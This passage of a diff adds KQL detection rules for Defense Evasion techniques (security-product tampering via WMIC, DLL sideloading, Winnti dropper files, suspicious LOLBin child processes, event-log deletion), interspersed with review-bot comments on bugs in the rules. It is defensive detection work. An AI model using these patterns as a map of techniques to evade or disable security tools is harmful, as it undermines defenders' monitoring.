"\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath 
contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\")))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll")))) \ No newline at end of file 
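Review bot: In the Arsenal-Image-Mounter exclusion, `FolderPath endswith "\\miutils.dl"` looks like a truncated `\\miutils.dll`; as written it can only match a file literally named `miutils.dl`, so loads of `miutils.dll` from that vendor directory are not excluded and half of that filter is dead (worth confirming against the upstream Sigma rule before changing it). Stylistically, the several-hundred-term `FolderPath endswith ... or` chain would be far easier to maintain as a set lookup on the file name, which `DeviceImageLoadEvents` exposes as `FileName`: declare `let SystemDlls = dynamic(["aclui.dll", "activeds.dll", ...]);` at the top of the file and replace the chain with `| where FileName in~ (SystemDlls)`, keeping the path-based `not(...)` exclusions as they are. The list itself would be unchanged, and since the rewrite is mostly that list I have not fenced it. The hunk begins at the `@@ -0,0 +1,12 @@` header several physical lines above; the `| where` clause is a single diff line wrapped across them.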
diff --git a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql
new file mode 100644
index 00000000..6e2f0e2b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql
@@ -0,0 +1,12 @@
+// Title: Potential Tampering With Security Products Via WMIC
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-01-30
+// Level: high
+// Description: Detects uninstallation or termination of security products using the WMIC utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administration
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or
ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql
new file mode 100644
index 00000000..890d0fc3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Wazuh Security Platform DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql
new file mode 100644
index 00000000..06c7af4f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql
@@ -0,0 +1,10 @@
+// Title: Potential WerFault ReflectDebugger Registry Value Abuse
+// Author: X__Junior
+// Date: 2023-05-18
+// Level: high
+// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql
new file mode 100644
index 00000000..cdd5f21a
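Review bot: The ReflectDebugger condition on the `| where` line of the WerFault rule looks unlikely to ever match on DeviceRegistryEvents, because that table carries the value name in `RegistryValueName` rather than appending it to `RegistryKey`, and the title itself describes ReflectDebugger as a registry value. If that is right, the faithful translation is `RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs" and RegistryValueName =~ "ReflectDebugger"`. The query also has no `ActionType` restriction, so key deletions and other registry events would match as well as the persistence write the description names; adding `ActionType == "RegistryValueSet"` would keep it on the documented behaviour. This should be checked against a real hit before merging since the rule is rated high.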
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Windows Defender Tampering Via Wmic.EXE
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql
new file mode 100644
index 00000000..fb937ab7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Winnti Dropper Activity
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
+| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
new file mode 100644
index 00000000..060564f2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of Dsacls to grant over permissive permissions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrators granting over permissive permissions to users
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
new file mode 100644
index 00000000..5b68fc1a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: high
+// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql
new file mode 100644
index 00000000..707953c1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Cabinet File Expansion
+// Author: Bhabesh Raj, X__Junior (Nextron Systems)
+// Date: 2021-07-30
+// Level: medium
+// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:" or ProcessCommandLine contains "–F:" or ProcessCommandLine contains "—F:" or ProcessCommandLine contains "―F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Admin$\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\C$\\" or ProcessCommandLine contains "\\Temporary Internet") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
new file mode 100644
index 00000000..e22d49ca
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-13
+// Level: high
+// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql
new file mode 100644
index 00000000..f45aa3dd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of DiskShadow.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql
new file mode 100644
index 00000000..83cb720b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql
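Review bot: The False Positives comment in the DiskShadow rule carries two misspellings, "postitve" and "levreage", which will be copied into every analyst-facing view of this rule; it should read `// - False positive can occur in cases where admin scripts leverage the "exec" flag to execute applications`. The text is comment-only, so the query itself is unaffected. Since these headers appear to be generated from the upstream rule metadata, the fix likely belongs upstream or in the converter rather than in this file alone.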
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of Regsvr32
+// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-05
+// Level: high
+// Description: Detects potentially suspicious child processes of "regsvr32.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Unlikely, but can rarely occur. Apply additional filters accordingly.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql
new file mode 100644
index 00000000..8b1a76b6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Processes Spawned by ConHost
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1202, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "cscript.exe", "mshta.exe", "powershell_ise.exe", "powershell.exe", "pwsh.dll", "regsvr32.exe", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\conhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
new file mode 100644
index 00000000..6ce8288c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious CMD Shell Output Redirect
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: medium
+// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
+This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
new file mode 100644
index 00000000..990a907d
--- /dev/null
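Review bot: The second line of the description in this hunk, `This technique is sometimes used by malicious actors ...`, was written without the `//` prefix, so it sits in the file as a bare statement ahead of `DeviceProcessEvents` and the query will fail to parse when loaded. Each line of a multi-line description needs the comment prefix, i.e. `// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.`. The Public Folder and Ping/Copy rules later in this series show the same generator emitting a stray blank line after a multi-line description, which is harmless, so the prefixing logic appears to live in the converter and is best fixed there rather than per file.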
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql
new file mode 100644
index 00000000..b82c97a4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious DMP/HDMP File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-07
+// Level: medium
+// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql
new file mode 100644
index 00000000..9543cafb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Event Viewer Child Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
new file mode 100644
index 00000000..b65c479e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Execution From Parent Process In Public Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript")) and InitiatingProcessFolderPath contains ":\\Users\\Public\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql
new file mode 100644
index 00000000..18f82a6f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution From Tmp Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
